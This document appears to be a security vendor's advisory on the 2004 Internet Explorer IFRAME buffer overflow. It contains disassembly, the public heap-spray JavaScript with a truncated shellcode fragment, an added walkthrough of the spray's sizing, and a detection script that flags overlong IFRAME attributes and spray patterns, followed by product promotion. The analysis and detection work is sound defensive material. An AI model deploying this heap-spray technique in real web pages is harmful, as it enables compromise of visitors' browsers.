Key Report on Network Attacks: How to Decode and Prevent the IE Iframe Vulnerability

On November 5, 2004 the Computer Emergency Response Team (CERT) of the United States announced the IE Iframe and Frame vulnerability and warned related organizations at all levels in the United States to take strict precautions against it. Recently the internet worm MyDoom began attacking the IE Iframe vulnerability from all sides. The DragonSoft Vulnerability Audit Team offers a theoretical analysis of this vulnerability and a plan for reducing the risk in the short term, to help users lower their exposure.

IE Iframe Buffer Overflow Analysis:
  • Iframe vulnerability analysis
    IFRAME and FRAME are both HTML tags that Internet Explorer uses to construct framesets in a document. The vulnerability is caused by a boundary error in the handling of certain attributes of the <IFRAME> tag. A remote attacker can place an overly long string in the SRC and NAME attributes of an <IFRAME> tag in a web page, and can exploit the vulnerability by luring the victim to that malicious web page or by sending it to the victim as an HTML e-mail.
                The buffer overflow sets EAX to 0x0D0D0D0D, after which this code is executed:
                7178EC02    8B08           MOV   ECX, DWORD PTR [EAX]
                [0x0D0D0D0D] == 0x0D0D0D0D, so ECX = 0x0D0D0D0D.
                7178EC04    68 847B7071    PUSH  71707B84
                7178EC09    50             PUSH  EAX
                7178EC0A    FF11           CALL  NEAR DWORD PTR [ECX]
                Again [0x0D0D0D0D] == 0x0D0D0D0D, so execution jumps to 0x0D0D0D0D.
                Both reads return 0x0D0D0D0D only because the heap spray shown below has filled the memory around that address with 0x0D bytes. The same bytes decode as OR EAX, 0D0D0D0D, a harmless 5-byte instruction, so execution slides through the sprayed filler into the shellcode placed at the end of each block.
  • Iframe Vulnerability Attack Analysis
    (1) Placing the shellcode with a script (heap spray)

    <SCRIPT language="javascript">
    // shellcode (payload bytes, as reproduced on this page)
    shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u89eb");
    // Nopslide will contain these bytes:
    bigblock = unescape("%u0D0D%u0D0D");
    // Heap blocks in IE have 20 dwords as header
    headersize = 20;
    // This is all very 1337 code to create a nopslide that will fit exactly
    // between the header and the shellcode in the heap blocks we want.
    // The heap blocks are 0x40000 dwords big, I can't be arsed to write good
    // documentation for this.
    slackspace = headersize + shellcode.length;
    while (bigblock.length < slackspace) bigblock += bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length - slackspace);
    while (block.length + slackspace < 0x40000) block = block + block + fillblock;
    // And now we can create the heap blocks, we'll create 700 of them to spray
    // enough memory to be sure enough that we've got one at 0x0D0D0D0D
    memory = new Array();
    for (i = 0; i < 700; i++) memory[i] = block + shellcode;
    </SCRIPT>
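    The sizing loop in the script above is undocumented, so here is an added example (written for this page, not part of the original exploit or of any DragonSoft product) that reproduces the same arithmetic for an arbitrary shellcode length and checks what it guarantees. Because each round replaces block with block + block + fillblock, the quantity block.length + slackspace doubles every round, and it starts at bigblock.length, which is a power of two; so the loop always stops when block.length + headersize + shellcode.length is exactly 0x40000 characters, with the filler occupying everything before the shellcode. The names sprayLayout, HEAP_BLOCK_CHARS and HEADER_CHARS are this example's own; the constants 0x40000 and 20 come from the script. Lengths are in JavaScript string characters (2 bytes each), as in the original.

```javascript
// Added example, not code from the original page: reproduces the heap-spray
// sizing arithmetic generically and reports the resulting block layout.
// Constants 0x40000 and 20 are taken from the script on the page; the names
// below are this example's own.
const HEAP_BLOCK_CHARS = 0x40000; // one sprayed allocation, in string characters
const HEADER_CHARS = 20;          // header allowance used by the script

function sprayLayout(shellcodeLength) {
  // The filler starts as two U+0D0D characters (bytes 0D 0D 0D 0D) and is
  // doubled until it is at least as long as header + shellcode.
  let bigblock = "\u0D0D\u0D0D";
  const slackspace = HEADER_CHARS + shellcodeLength;
  while (bigblock.length < slackspace) bigblock += bigblock;

  const fillblock = bigblock.substring(0, slackspace);
  let block = bigblock.substring(0, bigblock.length - slackspace);

  // Invariant: block.length + slackspace is a power of two and doubles each
  // round, so the loop exits exactly when it equals HEAP_BLOCK_CHARS.
  let rounds = 0;
  while (block.length + slackspace < HEAP_BLOCK_CHARS) {
    block = block + block + fillblock;
    rounds++;
  }

  return {
    slackspace,
    rounds,
    sledLength: block.length,
    // filler + shellcode + header fills one block exactly
    totalWithHeader: block.length + shellcodeLength + HEADER_CHARS,
    // share of each block that is filler, i.e. where a stray read or jump
    // into the block will land on 0x0D bytes rather than on the shellcode
    sledFraction: block.length / HEAP_BLOCK_CHARS,
    allFiller: /^\u0D0D*$/.test(block),
  };
}

// Stand-alone demonstration with the 10-character shellcode shown on the page.
console.log(JSON.stringify(sprayLayout(10)));
```

    With the page's 10-character shellcode the filler is 262114 characters long, built in 13 doubling rounds, and about 99.99% of every block is filler, which is why any read of 0x0D0D0D0D inside a sprayed block almost certainly returns 0x0D0D0D0D and why 700 such blocks are enough to cover that address.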
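    On the prevention side, the following is an added example (written for this page, not taken from the original article or from any DragonSoft product) of the kind of content check a mail gateway or web proxy could apply to the two patterns described above: IFRAME/FRAME tags whose SRC or NAME attribute is abnormally long, and the heap-spray idiom of an unescape'd 0x0D0D filler combined with a large array of blocks. The 256-character attribute threshold, the 100-block threshold, the function names and both sample documents are assumptions made for this example; the malicious sample is constructed here and contains no working shellcode.

```javascript
// Added example, not code from the original page: scans an HTML document for
// the IFRAME/FRAME overlong-attribute pattern and the heap-spray script idiom.
// Thresholds, names and samples are this example's assumptions.
const MAX_ATTR_LEN = 256;   // assumption: real src/name values are far shorter
const MIN_SPRAY_BLOCKS = 100; // assumption: a spray loop allocates many blocks

const TAG_RE = /<\s*(iframe|frame)\b([^>]*)>/gi;
const ATTR_RE = /\b(src|name)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
// unescape("%u0D0D%u0D0D") style filler (also the common 0x0C0C variant)
const SPRAY_FILLER_RE = /unescape\s*\(\s*["'](?:%u0[cd]0[cd]){2,}["']\s*\)/i;
// for (i=0;i<700;i++) memory[i] = ... : capture the block count
const SPRAY_LOOP_RE =
  /for\s*\(\s*\w+\s*=\s*0\s*;\s*\w+\s*<\s*(\d+)\s*;[^)]*\)\s*\w+\s*\[\s*\w+\s*\]\s*=/i;

// Returns one entry per SRC/NAME attribute of an IFRAME/FRAME tag that exceeds maxLen.
function findOverlongFrameAttrs(html, maxLen = MAX_ATTR_LEN) {
  const hits = [];
  for (const tag of html.matchAll(TAG_RE)) {
    for (const attr of tag[2].matchAll(ATTR_RE)) {
      const value = attr[2] ?? attr[3] ?? attr[4] ?? "";
      if (value.length > maxLen) {
        hits.push({ tag: tag[1].toLowerCase(), attr: attr[1].toLowerCase(), length: value.length });
      }
    }
  }
  return hits;
}

// Flags a script that builds a 0x0D0D filler and allocates many blocks of it.
function looksLikeHeapSpray(html, minBlocks = MIN_SPRAY_BLOCKS) {
  const filler = SPRAY_FILLER_RE.test(html);
  const loop = html.match(SPRAY_LOOP_RE);
  const sprayBlocks = loop ? parseInt(loop[1], 10) : 0;
  return { filler, sprayBlocks, suspicious: filler && sprayBlocks >= minBlocks };
}

function scanHtml(html) {
  const frames = findOverlongFrameAttrs(html);
  const spray = looksLikeHeapSpray(html);
  return { frames, spray, verdict: frames.length > 0 || spray.suspicious ? "block" : "allow" };
}

// Constructed samples for the example (not captured traffic).
const BENIGN =
  '<html><body><iframe src="https://example.com/page" name="content"></iframe></body></html>';
const MALICIOUS =
  '<script>bigblock = unescape("%u0D0D%u0D0D"); memory = new Array(); ' +
  'for (i=0;i<700;i++) memory[i] = block + shellcode;</script>' +
  '<IFRAME SRC=file://' + 'A'.repeat(4000) + ' NAME="' + 'B'.repeat(3000) + '"></IFRAME>';

console.log(JSON.stringify(scanHtml(BENIGN)));
console.log(JSON.stringify(scanHtml(MALICIOUS)));
```

    The attribute check alone catches the overflow trigger regardless of how the shellcode is delivered; the spray check is a secondary signal, since the same filler and loop idiom was reused by later browser exploits. Neither replaces applying the vendor patch, and the attribute regex is deliberately simple: it does not handle attributes that contain a literal '>' or quoted values that mention src or name.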
Vulnerability Assessment:
  • Network-based
    A network-based vulnerability assessment audits hosts over the network. It has five main functions:
    1. Network discovery: it scans every device and host on the network and finds unknown or unauthorized devices or hosts.
    2. Service discovery: it scans which services are running on the network and which ports are open.
    3. It finds vulnerabilities and exposures quickly.
    4. It provides vulnerability references to help technical managers patch their systems.
    5. It produces complete examination reports and efficiently provides security and risk information for the enterprise.


    Things to note:
    1. Most firewalls block ports, which affects the scan results.
    2. Some Windows vulnerabilities can only be determined with Registry access. Supply a proper credential to the VA tool you use.

    Advantages: centralized deployment and management, and easy large-scale vulnerability assessment.
    Disadvantage: it can examine the targets only with the access it is authorized to use from the outside, so it sees less than a scanner running on the host itself.

  • Host-based
    In host-based vulnerability assessment, the scanner is installed on the inspected host itself, so it has full authority and more privileges to examine that host, whereas a network-based scanner can only inspect from the outside over the network. It has three main functions:
    1. Checking for incorrectly set file permissions on the host.
    2. Checking for improper software settings (for example, passwords that are too simple).
    3. Finding unauthorized software installations; for example, an employee may have installed remote-control or VPN software on her/his workstation.

    Managers could consider installing host-based vulnerability assessment on the more important servers or hosts, so that high-risk vulnerabilities can be examined and patches installed. The managers' goal is to give the company's users a comfortable and safe network environment.

    Advantage: it has more scanning methods and can find more vulnerabilities.
    Disadvantage: it is hard to manage centrally.
Behind the Vulnerability Assessment- Vulnerability Database
Whether network-based or host-based, vulnerability assessment needs the latest vulnerability database. This database gathers information on many different vulnerabilities so that the examination can find vulnerabilities and exposures quickly. Moreover, keeping the vulnerability database up to date ensures that the examination results are as accurate as possible.

DragonSoft Provides the Solution
From the beginning, DragonSoft has been devoted to the research and development of vulnerability assessment for network security. To provide complete solutions, we supply both network-based and host-based vulnerability assessment for IT managers to choose from. Each has its advantages and disadvantages; customers can use both so that each makes up for the shortcomings of the other and the enterprise gets the most complete risk assessment.

DragonSoft Secure Scanner: It belongs to network vulnerability assessment. It examines vulnerabilities in network services and provides a complete risk assessment so that IT managers can examine the whole enterprise and plan the next improvements.

DragonSoft System Security Manager (DSSM): It belongs to server vulnerability assessment. At present it inspects the security of the system, searches for vulnerabilities, checks IDs and passwords, and provides the related patches for download to the server; the program can download the patches and apply them directly. In future versions, a centralized control center program will be added to ease the vulnerability management process.

Related Websites
DragonSoft Secure Scanner (product introduction)
About DragonSoft Security Associates, Inc.
DragonSoft Security Associates is a leading developer of network security software in Taiwan and an active contributor to network security education. Founded in 2002, DragonSoft offers vulnerability management solutions, including vulnerability assessment, system security management and intrusion prevention.